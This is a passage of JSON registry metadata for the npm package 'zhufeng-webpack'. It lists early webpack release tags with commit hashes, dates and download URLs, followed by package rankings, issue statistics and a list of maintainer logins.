github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T21:37:43.020Z","dependent_packages_count":0,"downloads":4,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":54.90282062971637,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":23.501326522931826},"purl":"pkg:npm/zhufeng-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/zhufeng-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/zhufeng-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/zhufeng-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T19:17:33.706Z","issues_count":10170,"pull_requests_count":9468,"avg_time_to_close_issue":10847458.413030302,"avg_time_to_close_pull_request":2764488.9421997755,"issues_closed_count":9900,"pull_requests_closed_count":8910,"pull_request_authors_count":1445,"issue_authors_count":6691,"avg_comments_per_issue":5.832251720747296,"avg_comments_per_pull_request":3.1891634980988592,"merged_pull_requests_count":6045,"bot_issues_count":8,"bot_pull_requests_count":2916,"past_year_issues_count":85,"past_year_pull_requests_count":955,"past_year_avg_time_to_close_issue":839618.0847457628,"past_year_avg_time_to_close_pull_request":356132.6119205298,"past_year_issues_closed_count":59,"past_year_pull_requests_closed_count":755,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":67,"past_year_avg_comments_per_issue":3.2823529411764705,"past_year_avg_comments_per_pull_request":4.964397905759163,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":141,"past_year_merged_pull_requests_count":601,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":130,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"